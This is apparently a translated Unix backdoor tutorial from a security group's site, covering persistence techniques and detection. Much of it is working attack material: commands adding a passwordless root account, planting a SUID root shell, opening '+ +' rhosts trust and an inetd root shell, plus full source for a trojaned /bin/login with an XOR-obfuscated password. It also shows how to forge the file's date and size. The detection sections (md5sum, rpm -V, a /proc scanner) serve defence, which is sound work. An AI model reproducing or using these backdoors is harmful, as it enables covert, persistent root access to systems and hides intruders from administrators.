Mail: e4gle@whitecell.org
Page: http://www.whitecell.org
Copyright: WhiteCell Security Systems
Overview
Backdoor introduction
Commonly used backdoor techniques
Backdoor detection
Example: the login backdoor

Backdoor profile
A backdoor is a technique the intruder installs after gaining full control of a system so that they can get back in later. It is usually implemented by modifying system configuration files or by installing third-party backdoor tools. A good backdoor is concealed, bypasses system logging, and is not easily noticed by the system administrator.

Commonly used backdoor techniques
- Adding a superuser account
- Cracking or sniffing user passwords
- Placing a SUID shell
- rhosts trust
- Abusing system service programs
- TCP / UDP / ICMP shells
- crontab timers
- Shared library files
- Rootkits
- Loadable kernel modules (LKM)

Adding a superuser account
    # echo "e4gle:x:0:0::/:/bin/sh" >> /etc/passwd
    # echo "e4gle::-1:-1:-1:-1:-1:-1:500" >> /etc/shadow

The shadow entry has an empty password field, so the UID 0 account e4gle logs in without a password. If the system does not allow UID 0 users to log in remotely, an ordinary user account must be added as well to log in with first.

Cracking or sniffing user passwords
After obtaining the shadow file, crack weak user passwords with John the Ripper. Install Sniffit or another sniffer and listen on the Telnet, FTP and similar ports to collect plaintext user passwords.

Placing a SUID shell
    # cp /bin/bash /dev/.rootshell
    # chmod u+s /dev/.rootshell

Any ordinary user who runs /dev/.rootshell gets a root shell. (Current versions of bash drop a setuid effective UID at startup unless started with -p, so on such systems the copy has to be run as /dev/.rootshell -p.)

rhosts
    # echo "+ +" > /.rhosts
    # rsh -l root victim.com csh -i

The "+ +" entry trusts every user on every host, so rsh from anywhere yields a remote root shell.

Abusing system service programs
Modify /etc/inetd.conf, for example:

    daytime stream tcp nowait root /bin/sh sh -i

Connecting to the daytime port then gives a shell. Trojaned programs can likewise replace in.telnetd, in.rexecd and other inetd servers, or an inetd service can be pointed at a backdoored login program.

TCP / UDP / ICMP shells
A bindshell is a network service, mostly over TCP or UDP, listening on a high port; it is easy to discover with netstat. A ping backdoor is activated by ICMP packets and carries the shell channel inside them. A shell carried in TCP ACK packets can pass through packet-filtering firewalls that only block incoming SYNs.

crontab timers
Jobs scheduled with crontab run at a fixed time, generally late at night when the system administrator is not online.

Shared library files
Embed a backdoor function in a shared library and use it to spawn a shell and obtain privileges. Because no system binary is modified, the administrator's checksum check of the binaries does not catch it.

Rootkits
A rootkit is a collection of system and backdoor tools:
- cleaning login records out of the logs
- faking checksums so modified binaries pass comparison
- replacing netstat, ps and other network and process tools
- a backdoored login program
They are easy to install and use.

Loadable kernel modules (LKM)
LKM: loadable kernel modules, loaded dynamically without recompiling the kernel. By intercepting system calls they can hide directories, files, processes and network connections, so they have very good concealment. The well-known LKM rootkits are Adore and KNARK.

Backdoor detection
Use your own experience, combined with specific tools, to do some checks by hand. Check the system with Tripwire or MD5 checksums. Monitor suspicious network connections to the target machine with an IDS. Checksums and process listings are only as trustworthy as the kernel that reports them; against an LKM rootkit, run the checks from a clean boot medium.

Example: the login backdoor
The intruder first backs up the original /bin/login and then replaces /bin/login with a backdoored version. When the intruder logs in with telnet and passes the correct backdoor password through an environment variable or the terminal type, they get a shell directly; a normal user's login is redirected to the original login program and handled as usual. The simplest login backdoor, ulogin.c, is as follows:

Example: login backdoor
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* the original /bin/login, moved aside by the intruder */
    #define _PATH_LOGIN "/sbin/xlogin"
    /* the backdoor password, passed in the DISPLAY environment variable */
    #define PASSWORD    "password"

    int main(int argc, char **argv, char **envp)
    {
        char *display = getenv("DISPLAY");

        /* no DISPLAY at all: hand over to the real login */
        if (display == NULL) {
            execve(_PATH_LOGIN, argv, envp);
            perror(_PATH_LOGIN);
            exit(1);
        }
        /* correct backdoor password: give a shell without any login */
        if (!strcmp(display, PASSWORD)) {
            system("/bin/csh");
            exit(1);
        }
        /* anything else: behave like the real login */
        execve(_PATH_LOGIN, argv, envp);
        exit(1);
    }

Using the backdoor login
Provided the telnet service is open on the victim, on your own machine:

    bash$ export DISPLAY=password
    bash$ telnet victim.com
    Trying xxx.xxx.xxx.xxx...
    Connected to victim.com (xxx.xxx.xxx.xxx).
    Escape character is '^]'.
    %

The telnet client exports DISPLAY to the server through the telnet environment option, so the backdoor sees it in its environment before the real login would prompt for anything.

strings command
The strings command prints the printable strings in a binary. Run on the ulogin program above:

    bash$ strings ulogin
    /lib/ld-linux.so.2
    ..............
    DISPLAY
    /sbin/xlogin
    password
    /bin/csh

The backdoor password, the path of the real login and the shell are all in plain view.

Encrypting the backdoor password (1)
1. Use the DES algorithm through the crypt() function: write a gen.c program that prints crypt(password, salt), store only that hash in the backdoor, and compare crypt(getenv("DISPLAY"), salt) against the stored hash. The gen.c source is not reproduced on this page.
2. Use the exclusive-or (XOR) algorithm and write the result as hexadecimal escapes, so the stored bytes are non-printable and strings does not show them. The encoder, encode.c, is as follows:

Encrypting the backdoor password (2)
    #include <stdio.h>
    #include <string.h>

    /* the XOR key */
    char magic[] = "\x71\x67\x6d\x7a\x65\x61\x7a";

    /* XOR str in place with the repeating key and return it */
    char *de(char *str, char *key)
    {
        int i = 0, j = 0, len;

        len = strlen(key);
        while (str[i] != '\0') {
            str[i] ^= key[j];
            j++;
            if (j == len)
                j = 0;
            i++;
        }
        return str;
    }

    /* print every byte of str as a C hex escape */
    void display(char *str)
    {
        int i;

        for (i = 0; i < strlen(str); i++)
            printf("\\x%x", (unsigned char) str[i]);
        printf("\n");
    }

    int main(int argc, char **argv)
    {
        if (argc != 2) {
            fprintf(stderr, "usage: %s string\n", argv[0]);
            return 1;
        }
        display(de(argv[1], magic));
        return 0;
    }

2. Compile encode and run it on each string in turn to XOR it with the magic key. For example the name of the original login file, /sbin/xlogin, becomes:

    \x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb

3. In the backdoor source, store the encoded form:

    char login[] = "\x5e\x14\xf\x13\xb\x4e\x2\x1d\x8\xa\x13\xb";

and add the same de() function with the same magic key, so that the backdoor recovers the real path at run time and uses the same decoding to determine whether the backdoor password is correct. strings now no longer shows the password, the path and the other tell-tale strings. Because de() stops at the first NUL byte, choose the key so that no byte of any encoded string XORs to 0x00.

Final modification (1)
Make the strings output of the backdoored ulogin resemble that of the normal login: in addition to the above, add a string array char strings[] = "..."; filled with the strings that appear in the real login, so the two outputs look alike.

Final modification (2)
Adjust the file date, size and other attributes.

1. Date:

    # ls -l /sbin/xlogin
    -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
    # touch -t 199802110000 ulogin
    # _

2. Size:

    # ls -l ulogin /sbin/xlogin
    -r-sr-xr-x root root  7542 Feb 11 1998 ulogin
    -r-sr-xr-x root root 19300 Feb 11 1998 /sbin/xlogin
    # bc
    19300-7542
    11758
    # dd if=/sbin/xlogin of=/tmp/t bs=11758 count=1
    1+0 records in
    1+0 records out
    11758 bytes transferred in 0.000379 secs (31016746 bytes/sec)
    # cat /tmp/t >> ulogin

The bytes appended after the ELF image are ignored by the loader. Appending updates the modification time again, so the touch step has to be repeated afterwards. Note that touch cannot set the inode change time: ls -lc still shows when the file was really installed.

Detecting the ulogin login backdoor
Use md5sum on the existing /bin/login and compare with the previously recorded value. On Red Hat Linux, verify the package with rpm:

    # rpm -V util-linux

Both checks rely on md5sum, rpm and the rpm database not having been tampered with, so run them from trusted media. When the intruder has come in through the backdoor login, who shows no user, but the login process is still there; check the system processes for an entry such as

    login -h xxx.xxx.xxx.xxx
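The following C program is an added example, not the page's encode.c or ulogin.c, and puts both halves of steps 2 and 3 above in one place: the encoder that turns a plaintext into the same \x escape text encode.c prints (and refuses a string that would contain a 0x00 byte after XOR), and the backdoor side that keeps only the encoded /sbin/xlogin path and password, decodes the path at run time, and checks a DISPLAY value by encoding it and comparing against the stored bytes. The key, the path and the password are the ones from the page; the function names are my own.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same 7-byte XOR key as encode.c on this page. */
static const char MAGIC[] = "\x71\x67\x6d\x7a\x65\x61\x7a";
#define MAGIC_LEN (sizeof MAGIC - 1)

/* Output of encode.c for "/sbin/xlogin" and "password": these bytes are
 * all that lands in the binary, so strings(1) shows neither plaintext. */
static const char LOGIN_ENC[] = "\x5e\x14\x0f\x13\x0b\x4e\x02\x1d\x08\x0a\x13\x0b";
static const char PASS_ENC[]  = "\x01\x06\x1e\x09\x12\x0e\x08\x15";

/* XOR n bytes of buf in place with the repeating key (what de() does). */
static void xor_bytes(unsigned char *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        buf[i] ^= (unsigned char)MAGIC[i % MAGIC_LEN];
}

/* Encoder side: write plain XOR MAGIC as C escapes in encode.c's format
 * ("\x5e\x14\xf...", no zero padding). Returns -1 if a byte would encode
 * to 0x00 (de() would stop there) or if out is too small, else 0. */
int encode_to_escapes(const char *plain, char *out, size_t outsz)
{
    size_t n = strlen(plain), used = 0;
    if (outsz == 0)
        return -1;
    out[0] = '\0';
    for (size_t i = 0; i < n; i++) {
        unsigned char b = (unsigned char)plain[i] ^ (unsigned char)MAGIC[i % MAGIC_LEN];
        if (b == 0)
            return -1;
        int w = snprintf(out + used, outsz - used, "\\x%x", b);
        if (w < 0 || (size_t)w >= outsz - used)
            return -1;
        used += (size_t)w;
    }
    return 0;
}

/* Backdoor side: decode an obfuscated string into a malloc'd buffer (caller frees). */
char *decode(const char *enc)
{
    size_t n = strlen(enc);
    char *out = malloc(n + 1);
    if (out == NULL)
        return NULL;
    memcpy(out, enc, n + 1);
    xor_bytes((unsigned char *)out, n);
    return out;
}

/* Backdoor side: is candidate (the DISPLAY value) the backdoor password?
 * The candidate is encoded and compared with PASS_ENC, so the plaintext
 * password never exists in memory; the length check stops prefix matches. */
int is_backdoor_password(const char *candidate)
{
    unsigned char tmp[64];
    size_t n = strlen(candidate);
    if (n != strlen(PASS_ENC) || n >= sizeof tmp)
        return 0;
    memcpy(tmp, candidate, n);
    xor_bytes(tmp, n);
    return memcmp(tmp, PASS_ENC, n) == 0;
}

/* Convenience checks used by main and the tests. */
int encodes_to(const char *plain, const char *expected)
{
    char buf[256];
    return encode_to_escapes(plain, buf, sizeof buf) == 0 && strcmp(buf, expected) == 0;
}

int decodes_to(const char *enc, const char *expected)
{
    char *p = decode(enc);
    int ok = p != NULL && strcmp(p, expected) == 0;
    free(p);
    return ok;
}

int main(void)
{
    char esc[128];
    if (encode_to_escapes("/sbin/xlogin", esc, sizeof esc) == 0)
        printf("encoded path: %s\n", esc);
    char *path = decode(LOGIN_ENC);
    printf("decoded path: %s\n", path);
    free(path);
    printf("DISPLAY=password accepted: %d\n", is_backdoor_password("password"));
    printf("DISPLAY=passwor accepted:  %d\n", is_backdoor_password("passwor"));
    return 0;
}
```

Compile with cc -o xorstrings xorstrings.c; strings on the result shows neither /sbin/xlogin nor password. This is obfuscation, not encryption: the key sits next to the encoded bytes in the same binary, so anyone who disassembles the backdoor, or runs it under strace and watches the execve of /sbin/xlogin, recovers both. It defeats strings and nothing more.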
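As an added example for the process check in the last step (this is not a tool from the page), the following C program reads /proc/<pid>/cmdline for every process and reports those whose argv is login -h <host>, which is what a telnet session through the backdoor leaves behind while who shows nothing. The parsing function takes the raw NUL-separated buffer, so it is exercised on constructed cmdline strings; the /proc walk itself is Linux-specific and only useful when the kernel is not lying.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <dirent.h>

/* Pass a string literal as (buffer, length): the implicit trailing NUL is
 * counted, which mirrors how /proc terminates the last argument. */
#define CMDLINE(lit) (lit), sizeof(lit)

/* /proc/<pid>/cmdline is argv with each element terminated by a NUL byte.
 * Return 1 if it is "login -h <host>" (login(1) handling a remote session),
 * the entry the page says to look for when who(1) shows no such user. */
int is_remote_login_cmdline(const char *buf, size_t len)
{
    const char *end = buf + len, *p = buf, *base;

    if (len == 0 || buf[len - 1] != '\0')      /* must end with a NUL */
        return 0;
    base = strrchr(p, '/');                      /* basename(argv[0]) */
    base = base ? base + 1 : p;
    if (strcmp(base, "login") != 0)
        return 0;
    for (p += strlen(p) + 1; p < end; p += strlen(p) + 1) {
        if (strcmp(p, "-h") == 0)                /* "-h host": host must follow */
            return p + 3 < end && p[3] != '\0';
        if (strncmp(p, "-h", 2) == 0)            /* "-hhost" form */
            return 1;
    }
    return 0;
}

/* Walk /proc and return how many processes match, printing each pid.
 * A trojaned ps is bypassed, but an LKM rootkit hiding processes hides them
 * here too; cmdlines longer than the buffer are skipped as non-matching. */
int scan_proc_for_remote_logins(void)
{
    DIR *d = opendir("/proc");
    struct dirent *e;
    int found = 0;
    char path[300], buf[4096];

    if (d == NULL)
        return -1;
    while ((e = readdir(d)) != NULL) {
        if (!isdigit((unsigned char)e->d_name[0]))
            continue;
        snprintf(path, sizeof path, "/proc/%s/cmdline", e->d_name);
        FILE *f = fopen(path, "rb");
        if (f == NULL)
            continue;
        size_t n = fread(buf, 1, sizeof buf, f);
        fclose(f);
        if (is_remote_login_cmdline(buf, n)) {
            printf("pid %s: remote login session (login -h)\n", e->d_name);
            found++;
        }
    }
    closedir(d);
    return found;
}

int main(void)
{
    /* constructed sample, the same shape /proc hands back */
    printf("sample matches: %d\n",
           is_remote_login_cmdline(CMDLINE("login\0" "-h\0" "192.0.2.10")));
    int n = scan_proc_for_remote_logins();
    if (n < 0)
        printf("cannot read /proc\n");
    else
        printf("%d remote login process(es) on this host\n", n);
    return 0;
}
```

Run it as root so every cmdline is readable, then compare each reported host with the output of who; a login -h process whose host has no utmp entry is the sign the page describes.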